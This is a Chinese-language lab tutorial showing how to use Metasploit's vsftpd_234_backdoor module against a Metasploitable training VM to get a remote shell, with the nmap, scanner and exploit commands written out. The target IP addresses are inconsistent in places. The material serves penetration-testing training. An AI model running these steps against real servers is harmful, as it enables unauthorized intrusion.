引言
Metasploit项目是一个旨在提供安全漏洞信息计算机安全项目,可以协助安全工程师进行渗透测试(penetration testing)及入侵检测系统签名开发。Metasploit项目最为知名的子项目是开源的Metasploit框架,一套针对远程主机进行开发和执行“exploit代码”的工具。
Metasploitable 是一个刻意制作出来包含漏洞的Linux虚拟机系统。它可以用来做安全训练,测试安全工具和练习渗透测试技术。
本文将使用Metasploit和Metasploitable和大家共同分享一下如何使用Metasploit这块渗透测试利器针对特定版本的vsftpd进行利用达到控制目标主机的目的。
本文采用Metasploit和Metasploitable的镜像安装包,从而免去了繁琐的软件安装、环境配置阶段,相关下载链接在文章末尾。
关于本文的教学视频已同步上传与Bilibili上,有喜欢的朋友请点赞、投币、转发,谢谢大家。bilibili视频链接:https://www.bilibili.com/video/BV12Q4y1Y7bw#reply5252435237
利用的vsftpd
2.3.4版本的vsftpd存在这样的一个漏洞,当在用户名后加上":)"时会触发ftp服务器的6200端口连接的shell
渗透利用过程
(1)首先使用nmap查看目标主机,目标即为安装了Metasploitable的服务器(本文安装Metasploit的服务器IP:192.168.5.141,安装Metasploitable的服务器ip:192.168.5.1.169)开放的端口
执行命令:nmap 192.168.5.169
(2)使用Metasploit搜寻和ftp有关的扫描模块,执行命令:search scanner/ftp
(3)由于该漏洞只针对特定版本的vsftpd(2.3.4版本)所以首选需要使用auxiliary/scanner/ftp/ftp_version模块探测目标机器上vsftpd的版本号
执行命令 1、use auxiliary/scanner/ftp/ftp_version
2、set RHOSTS 192.168.5.159
3、exploit
(4)搜寻该服务可能被利用的利用模块
search vsftpd
(5)使用该模块
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.5.169
exploit
总结
我们通过利用2.3.4版本的ftp存在一个backdoor漏洞成功拿到目标机器的shell。以上过程仅供大家学习,不足之处也希望大家多多指点!切勿将其非法途径,违法必究!
下载链接:首先请关注微信公众号安全密码盒,扫描下方二维码即可关注
回复"metasploit"即可获取Metasploit的下载链接
回复“metasploitable”即可获取Metasploitable的下载链接
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。